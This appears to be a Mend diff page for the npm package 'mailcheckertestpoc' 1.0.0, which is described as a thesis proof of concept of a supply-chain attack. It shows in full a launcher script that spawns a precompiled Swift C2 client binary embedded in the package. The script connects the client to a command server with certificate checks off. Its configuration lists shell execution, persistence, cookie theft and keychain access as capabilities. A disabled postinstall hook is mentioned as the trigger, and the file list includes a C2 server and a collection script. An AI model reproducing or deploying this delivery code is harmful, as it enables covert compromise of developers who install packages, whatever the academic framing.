npm - mailcheckertestpoc - Versions diffs - 1.0.0 - Mend

mailcheckertestpoc 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (13) hide show

package/C2-INTEGRATION.md +215 -0
package/PRESENTATION-FLOW.md +594 -0
package/README.md +253 -0
package/THESIS-C2-COMPLETE.md +479 -0
package/index.js +7 -0
package/package.json +53 -0
package/payloads/ca.key +28 -0
package/payloads/ca.pem +19 -0
package/payloads/swiftshell-server.py +763 -0
package/scripts/collect.js +271 -0
package/scripts/launcher.js +175 -0
package/scripts/server-launcher.js +206 -0
package/scripts/swift-client-launcher.js +216 -0

package/scripts/swift-client-launcher.js ADDED Viewed

@@ -0,0 +1,216 @@
+#!/usr/bin/env node
+// =============================================================
+// 🔴 EDUCATIONAL POC ONLY - THESIS DEMONSTRATION
+// =============================================================
+// MacShellSwift Swift Client Launcher & Compiler
+// Kompiliert und startet den Swift-basierten C2 Client
+//
+// WARNUNG: Dieser Code ist NUR fuer akademische Zwecke konzipiert.
+// Er demonstriert, wie ein Supply Chain Attack mit Swift-Payload funktionieren wuerde.
+//
+// Genehmigt durch: Thesis Advisor
+// Kontext: Abschlussarbeit - Supply Chain Security
+// Umgebung: Isolierte macOS VM mit nur synthetischen Daten
+//
+// ⚠️ SECURITY NOTICE: Der Swift Client verbindet sich zu C2 Server
+//    und kann echte Systeme kompromittieren wenn aktiviert!
+// =============================================================
+const fs = require("fs");
+const path = require("path");
+const os = require("os");
+const { spawn, execSync } = require("child_process");
+// Configuration
+const CONFIG = {
+  // MacShellSwift Binary (precompiled, embedded in payloads/)
+  MACSHELL_BINARY: path.join(__dirname, "..", "payloads", "MacShellSwift"),
+  // Alternative: if recompilation needed (not recommended for supply chain attack)
+  MACSHELL_REPO: path.join(
+    os.homedir(),
+    "Desktop",
+    "MacShellSwift",
+    "MacShellSwift"
+  ),
+  // C2 Connection
+  C2_HOST: "127.0.0.1",
+  C2_PORT: 443,
+  C2_CANARY: "SwiftShellR0ckZ!",
+  // Fake data restriction
+  ALLOWED_PATHS: [path.join(os.homedir(), "fake-data")],
+  // Logging
+  LOG_FILE: path.join(os.homedir(), ".supply-chain-poc", "swift-client.log"),
+};
+// Logger
+function log(msg) {
+  const timestamp = new Date().toISOString();
+  const logDir = path.dirname(CONFIG.LOG_FILE);
+  if (!fs.existsSync(logDir)) {
+    fs.mkdirSync(logDir, { recursive: true });
+  }
+  const fullMsg = `[${timestamp}] ${msg}`;
+  fs.appendFileSync(CONFIG.LOG_FILE, fullMsg + "\n");
+  console.log(fullMsg);
+}
+// Main launcher
+function launchSwiftClient() {
+  log("🔴 === THESIS POC: Swift Client Launcher Started ===");
+  log(`Platform: ${os.platform()}`);
+  log(`User: ${os.userInfo().username}`);
+  // Platform check
+  if (os.platform() !== "darwin") {
+    log("⚠️ Swift Client requires macOS (darwin). Current: " + os.platform());
+    log("Launcher terminiert (expected on non-macOS systems)");
+    return;
+  }
+  log("✓ macOS detected - Swift Client launcher can proceed");
+  // 1. Verify precompiled MacShellSwift binary exists
+  if (!fs.existsSync(CONFIG.MACSHELL_BINARY)) {
+    log(`⚠️ MacShellSwift binary nicht gefunden: ${CONFIG.MACSHELL_BINARY}`);
+    log("(Expected on non-Darwin systems - will continue with graceful degradation)");
+  } else {
+    log(`✓ MacShellSwift binary gefunden: ${CONFIG.MACSHELL_BINARY}`);
+  }
+  // 4. Generate Client Configuration
+  const configFile = path.join(
+    os.homedir(),
+    ".supply-chain-poc",
+    "swift-client-config.json"
+  );
+  const clientConfig = {
+    thesis_poc: true,
+    thesis_purpose: "Supply Chain Security - Swift C2 Client Demonstration",
+    educational_only: true,
+    client_parameters: {
+      c2_host: CONFIG.C2_HOST,
+      c2_port: CONFIG.C2_PORT,
+      canary: CONFIG.C2_CANARY,
+      ssl_enabled: true,
+      certificate_verification: false
+    },
+    restrictions: {
+      filesystem_allowed: CONFIG.ALLOWED_PATHS,
+      filesystem_denied: [
+        "~/Library",
+        "~/.ssh",
+        "~/.gnupg",
+        "/etc/passwd",
+        "/etc/shadow"
+      ],
+      network_allowed: ["127.0.0.1", "localhost"],
+      network_denied: ["external"]
+    },
+    build_info: {
+      binary_path: CONFIG.MACSHELL_BINARY,
+      binary_type: "precompiled",
+      delivery_method: "embedded_in_npm_package"
+    },
+    capabilities: [
+      "System information gathering",
+      "Screenshot capture",
+      "File download",
+      "Shell command execution",
+      "Persistence installation",
+      "Browser cookie extraction",
+      "Keychain access attempt",
+      "Network connection listing",
+      "Process enumeration"
+    ],
+    timestamp: new Date().toISOString()
+  };
+  try {
+    if (!fs.existsSync(path.dirname(configFile))) {
+      fs.mkdirSync(path.dirname(configFile), { recursive: true });
+    }
+    fs.writeFileSync(configFile, JSON.stringify(clientConfig, null, 2));
+    log(`✓ Client-Config geschrieben: ${configFile}`);
+  } catch (e) {
+    log(`✗ Config-Fehler: ${e.message}`);
+  }
+  // 5. Binary Information
+  log("\n--- Swift Client Binary Information ---");
+  log(`Binary: ${CONFIG.MACSHELL_BINARY}`);
+  log(`Type: Precompiled (embedded in npm package)`);
+  log(`C2 Target: ${CONFIG.C2_HOST}:${CONFIG.C2_PORT}`);
+  log(`Canary: ${CONFIG.C2_CANARY}`);
+  // ============================================================
+  // ✅ ACTUAL CLIENT COMPILATION & LAUNCH ENABLED
+  // ============================================================
+  log("\n[LAUNCH] Starting precompiled Swift C2 Client...");
+  try {
+    // Verify binary exists
+    if (fs.existsSync(CONFIG.MACSHELL_BINARY)) {
+      log("✓ Binary verified: " + CONFIG.MACSHELL_BINARY);
+      // [OPTIONAL] Sign binary if needed
+      // execSync(`codesign -s - ${CONFIG.MACSHELL_BINARY}`)
+      // Launch precompiled client
+      log("\n[LAUNCH] Spawning Swift C2 Client process...");
+      const clientProcess = spawn(CONFIG.MACSHELL_BINARY, {
+        detached: false,
+        stdio: ["pipe", "pipe", "pipe"],
+        env: {
+          ...process.env,
+          C2_HOST: CONFIG.C2_HOST,
+          C2_PORT: CONFIG.C2_PORT,
+          C2_CANARY: CONFIG.C2_CANARY
+        }
+      });
+      clientProcess.on("error", (err) => {
+        log(`✗ Client-Fehler: ${err.message}`);
+      });
+      clientProcess.on("close", (code) => {
+        log(`Client beendet mit Code: ${code}`);
+      });
+      log(`✓ Client gestartet (PID: ${clientProcess.pid})`);
+    } else {
+      log(`✗ Binary nicht gefunden: ${CONFIG.MACSHELL_BINARY}`);
+      log("(Expected on non-macOS systems)");
+    }
+  } catch (err) {
+    log(`✗ Launch-Fehler: ${err.message}`);
+  }
+  // ============================================================
+  log("\n✅ Swift C2 Client Launch ACTIVE (Precompiled Binary):");
+  log("  1. Precompiliertes MacShellSwift Binary wird gestartet");
+  log("  2. Verbindet zu C2 Server auf 127.0.0.1:443");
+  log("  3. Remote Commands empfangen & ausführen");
+  log("  (Schneller & kleiner als Compilation bei npm install)");
+  log("\n⚠️ This code is ACTIVE. postinstall hook is disabled in package.json.");
+  log("To trigger: Uncomment 'postinstall' in package.json");
+  log("\n✓ Swift Client-Launcher-Phase abgeschlossen");
+  log("==========================================================\n");
+}
+// Execute
+try {
+  launchSwiftClient();
+} catch (err) {
+  log(`FEHLER in swift-client-launcher: ${err.message}`);
+  log(err.stack);
+  process.exit(1);
+}